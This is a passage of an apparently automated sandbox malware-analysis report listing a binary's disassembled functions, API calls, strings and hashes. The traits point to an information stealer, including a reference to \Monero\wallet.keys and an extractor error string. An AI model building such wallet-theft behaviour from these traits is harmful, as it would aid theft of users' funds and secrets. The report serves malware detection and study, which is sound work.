                                        • Instruction Fuzzy Hash: E741BE71C10208AADB14EFA1C8A1FDDB778AF14300F504129F156BB1D1DF756A4AEF91
                                        Function 00CA9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00CA9F41
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 4171519190-1096346117
                                        • Opcode ID: 26a47a83be2dc7842d00b21491a0cf0bc555750a53fbb9510d67e199cde2161a
                                        • Instruction ID: f247980b31a76fe88b0c1fcfe54c28eb264df84dac3474aa90b713f6fff13ee3
                                        • Opcode Fuzzy Hash: 26a47a83be2dc7842d00b21491a0cf0bc555750a53fbb9510d67e199cde2161a
                                        • Instruction Fuzzy Hash: F8613D70900248EFDB24EFA5CC96FED77B9AF41304F048518F94A6B191DF706A05DB51
                                        Function 00CB40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,009DDB60,00000000,00020119,?), ref: 00CB40F4
                                        • RegQueryValueExA.ADVAPI32(?,009DEFD0,00000000,00000000,00000000,000000FF), ref: 00CB4118
                                        • RegCloseKey.ADVAPI32(?), ref: 00CB4122
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4147
                                        • lstrcat.KERNEL32(?,009DEFA0), ref: 00CB415B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 96c0e163a49e245e8e39915f95c186eb37d819181a5008dd4153b26b56445bf8
                                        • Instruction ID: c886f74cba4ce98b5151d11aec858d6a056e021c2856e8e7939bbbafdc058ca6
                                        • Opcode Fuzzy Hash: 96c0e163a49e245e8e39915f95c186eb37d819181a5008dd4153b26b56445bf8
                                        • Instruction Fuzzy Hash: 49418AB6D0014C6BDB14EBE0EC86FFE737DAB89300F04455DB6155B181EA75AB8C8B92
                                        Function 00CB6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00CB696C
                                        • sscanf.NTDLL ref: 00CB6999
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CB69B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CB69C0
                                        • ExitProcess.KERNEL32 ref: 00CB69DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: cf02a0d6fb2ee81682d49748bbb5f7ba5ed04010bfcfcb26c70916a6f5d8f0a3
                                        • Instruction ID: fcc1e577deface9426852d4607d20169e3f5cb819e8a96cd512612527b11b544
                                        • Opcode Fuzzy Hash: cf02a0d6fb2ee81682d49748bbb5f7ba5ed04010bfcfcb26c70916a6f5d8f0a3
                                        • Instruction Fuzzy Hash: 4B21BB75D1420CAFCB08EFE5D9859EEB7B5BF48300F04452EE416B7250EB346609CB69
                                        Function 00CB7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7E37
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,009CBC58,00000000,00020119,?), ref: 00CB7E5E
                                        • RegQueryValueExA.ADVAPI32(?,009DDB20,00000000,00000000,000000FF,000000FF), ref: 00CB7E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00CB7E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: d3b859d97f62a9b654fc42a4eb528affabcc184914e863d01d0e95efc6412bf0
                                        • Instruction ID: a15f77e00beaa1828c5bc14b5a47ced57db94d3ec240ad8655ec34a167a7f5ed
                                        • Opcode Fuzzy Hash: d3b859d97f62a9b654fc42a4eb528affabcc184914e863d01d0e95efc6412bf0
                                        • Instruction Fuzzy Hash: 721194B1A44249EFD714CFD6DC89FBBBBB8EB44701F10422DFA15AB280D77468048BA1
                                        Function 00CB9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(009DEB98,?,?,?,00CB140C,?,009DEB98,00000000), ref: 00CB926C
                                        • lstrcpyn.KERNEL32(00EEAB88,009DEB98,009DEB98,?,00CB140C,?,009DEB98), ref: 00CB9290
                                        • lstrlen.KERNEL32(?,?,00CB140C,?,009DEB98), ref: 00CB92A7
                                        • wsprintfA.USER32 ref: 00CB92C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: cf702ab54c766079c1e2951c9e1f9c95dca2effb1ea6c93cfd1250ac672bcb1c
                                        • Instruction ID: 5fd5dd2da30e96b860053acf0b364c30ce7a5bb8d4eeade6aaf5e02ecb7634ab
                                        • Opcode Fuzzy Hash: cf702ab54c766079c1e2951c9e1f9c95dca2effb1ea6c93cfd1250ac672bcb1c
                                        • Instruction Fuzzy Hash: 0101A97550014CFFCB04DFEDC989EAE7BB9EB44355F14815CF909AB244C631AA44DB92
                                        Function 00CA12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CA12B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA12BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CA12D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CA12F5
                                        • RegCloseKey.ADVAPI32(?), ref: 00CA12FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: ea29e1e93a5840bc3c0360c0735dc9f5002ef2b9b165d4175857cd5687937c4f
                                        • Instruction ID: de9de548f26861904f2bcc1f309ee3b7b405e84c84945b90735807b662b98526
                                        • Opcode Fuzzy Hash: ea29e1e93a5840bc3c0360c0735dc9f5002ef2b9b165d4175857cd5687937c4f
                                        • Instruction Fuzzy Hash: 310136B5A4020CBFDB14DFD1DC89FAEB7B8EB48701F048159FA05AB280D670AA058F51
                                        Function 00CBC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 41cf30a04ae08e7c79ac85ea82f1dc61d7c3584d88598d1927d432a1ac49543a
                                        • Instruction ID: 4864601c7b297ff33d96ea24af9fb62e9caeff934c67b81b81a205dd0ae34cff
                                        • Opcode Fuzzy Hash: 41cf30a04ae08e7c79ac85ea82f1dc61d7c3584d88598d1927d432a1ac49543a
                                        • Instruction Fuzzy Hash: F341E6B150075C5EEB218B24CCC5FFBBBE89F45704F1444E8E99A96182E2719B45DF60
                                        Function 00CB6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00CB6663
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB6726
                                        • ExitProcess.KERNEL32 ref: 00CB6755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: ed970098a0f51cf36f97502b92845e22d36451ec43c54d0159004092ae0a3dbe
                                        • Instruction ID: e63c98f80569e2f3ccfa0ae1058ca990e713d4e7f84518d230530aac9a49347f
                                        • Opcode Fuzzy Hash: ed970098a0f51cf36f97502b92845e22d36451ec43c54d0159004092ae0a3dbe
                                        • Instruction Fuzzy Hash: 743127B1C01218AEDB14EB90DC96BDEB77CAF04300F804199F20A76191DF746B48DF6A
                                        Function 00CB87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E28,00000000,?), ref: 00CB882F
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB8836
                                        • wsprintfA.USER32 ref: 00CB8850
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 1dd8567b06e08344549dbf8f7c1a4fe1931119879060b8ddab4889eec9536bf0
                                        • Instruction ID: ba735ad40b7c8c8de0f3fd5e76166031652a2a2867382a0c23bca2466183fd9c
                                        • Opcode Fuzzy Hash: 1dd8567b06e08344549dbf8f7c1a4fe1931119879060b8ddab4889eec9536bf0
                                        • Instruction Fuzzy Hash: 372133B1A40248AFDB04DF95DD89FAEBBB8FB48701F14412DF505BB280C7796904CBA5
                                        Function 00CB8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00CB951E,00000000), ref: 00CB8D5B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB8D62
                                        • wsprintfW.USER32 ref: 00CB8D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 3d210bb027bb926f2dc075e66a284fc97eac401e146685eb6472ff5281639b88
                                        • Instruction ID: 8821cf790f6fb97e68c12dba4c037c3d5f6c2aa1198cac273a6ab9c623b2acdd
                                        • Opcode Fuzzy Hash: 3d210bb027bb926f2dc075e66a284fc97eac401e146685eb6472ff5281639b88
                                        • Instruction Fuzzy Hash: CBE08670A4020CFFC704DB95DC4EE597BB8EB04701F044068FD099B280D9716E048B56
                                        Function 00CAA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
